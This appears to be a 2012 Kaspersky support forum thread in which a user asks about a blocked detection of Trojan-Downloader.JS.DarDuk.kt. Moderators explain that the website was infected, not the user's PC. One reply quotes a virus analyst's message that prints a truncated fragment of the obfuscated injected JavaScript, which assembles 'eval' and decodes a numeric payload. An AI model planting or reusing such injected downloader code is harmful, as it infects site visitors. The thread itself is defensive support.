IPB

Welcome Guest ( Log In | Register )

 
Reply to this topicStart new topic
> KAV and Trojan-Downloader.JS.DarDuk.kt
pustolovka
post 13.04.2012 18:35
Post #1


Member
**

Group: Members
Posts: 28
Joined: 1.11.2010




My KAV 2012 detected Trojan-Downloader.JS.DarDuk.kt when I visited a particular web page. One minute later I googled it again and klicked on it and KAV did not report that it was malicious. Is my computer still infected? How can I be sure that this trojan is not downloaded on my computer. Here is a screenshot of report:
Attached File(s)
Attached File  trojan_potlista.png ( 132,04K ) Number of downloads: 45
 
Go to the top of the page
 
+Quote Post
Berny
post 13.04.2012 19:30
Post #2


Forum Elite
**************

Group: Moderators
Posts: 11188
Joined: 30.10.2007




An infected website was detected and blocked.
Your PC was not infected.
Please right click the detected object and delete it from the list,
then reboot and proceed with CCleaner.

This post has been edited by Berny: 13.04.2012 19:30
Go to the top of the page
 
+Quote Post
Caos
post 13.04.2012 19:46
Post #3


Spanish Forum Moderator
***************

Group: Moderators
Posts: 16901
Joined: 25.09.2007
From: España (Spain)




QUOTE
Hello,

This is not a false alarm, this site is infected.

Here is the malicious code:
<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';}
n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.

If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change login/password, because they can be stolen.
Regards
Virus Analyst


--------------------
Go to the top of the page
 
+Quote Post
pustolovka
post 14.04.2012 19:03
Post #4


Member
**

Group: Members
Posts: 28
Joined: 1.11.2010




QUOTE(Berny @ 13.04.2012 19:30) *
An infected website was detected and blocked.
Your PC was not infected.
Please right click the detected object and delete it from the list,
then reboot and proceed with CCleaner.


Thanks!
Can you please tell me what the quoted post under ( from Caos) means?
Go to the top of the page
 
+Quote Post
rudger79
post 14.04.2012 20:18
Post #5


Forum Elite
**************

Group: Gold beta testers
Posts: 9145
Joined: 20.10.2008
From: Kodiak USA




Caos sent the website to KL virus lab to check. Kaspersky Virus lab responded with what is in the quote. To paraphrase: the site is infected with identification of the code that is malicious. Also KL has instructions for web master and to change your passwords and login credentials. As Berny says, Kaspersky blocked the infected website.

Right click that entry in your screenshot and remove or delete then to be safe, scan with Kaspersky and post any detections here on the forum.

This post has been edited by rudger79: 14.04.2012 20:21


--------------------
2015 Beta Test Machine specs: Windows 7 Pro x64 SP1, Real Machine (laptop), 4GB Ram No OEM stuff. My GSI Report Link

________________________________________________________________________________
1.Laptop -
Windows 7 Pro SP 1 x64 4gb - FF latest -
KIS 2015 Beta
2.Desktop -
Windows 7 Pro SP 1 x86 4gb - FF latest - KIS 2014
_______________________________________________________________________

My Kaspersky Account Kaspersky Support Ticket Request to Kaspersky Virus Lab Link to GSI Report Instructions Kaspersky Latest Product Versions
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic

 



Lo-Fi Version Time is now: 18.09.2014 23:41